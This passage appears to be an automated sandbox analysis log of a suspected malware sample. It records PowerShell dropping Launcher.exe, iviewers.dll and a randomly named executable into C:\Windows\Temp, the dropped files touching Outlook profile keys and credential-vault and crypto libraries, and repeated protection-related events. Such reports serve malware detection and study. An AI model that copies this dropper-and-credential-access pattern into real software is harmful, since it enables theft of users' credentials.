              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\Temp\Launcher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
              Source: C:\Windows\Temp\Launcher.exeWindow found: window name: SysTabControl32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\Temp\Launcher.exeWindow detected: Number of UI elements: 24
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Temp\xdnfl52f.civ.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Binary string: OLEView.pdb source: Launcher.exe, Launcher.exe, 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Launcher.exe.0.dr
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_0066B905 __EH_prolog3_GS,#540,#4155,StringFromGUID2,wsprintfW,RegQueryValueW,#540,#540,#538,#4155,#4155,#940,#4155,#940,#1197,#355,#2507,#3494,#858,#800,#800,#641,LoadLibraryW,GetProcAddress,#800,#641,#4155,#4155,#940,#1197,FreeLibrary,#6398,#800,#800,#800,#800,3_2_0066B905
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F400BD pushad ; iretd 0_2_00007FF848F400C1
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_0067F3B0 push ecx; ret 3_2_0067F3C3
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_0067FDDD push ecx; ret 3_2_0067FDF0
              Source: C:\Windows\Temp\Launcher.exeCode function: 3_2_00665EF0 pushad ; ret 3_2_00665EF1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04EF636D push eax; ret 4_2_04EF6381
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6BCAB2 push rdi; retf 0004h10_2_00007FF75A6BCAB5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\Launcher.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\iviewers.dllJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\xdnfl52f.civ.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\Launcher.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\iviewers.dllJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\xdnfl52f.civ.exeJump to dropped file
              Source: C:\Windows\Temp\xdnfl52f.civ.exeCode function: 10_2_00007FF75A6EC600 ExitProcess,OpenMutexA,ExitProcess,CreateMutexExA,ExitProcess,ReleaseMutex,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,10_2_00007FF75A6EC600

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
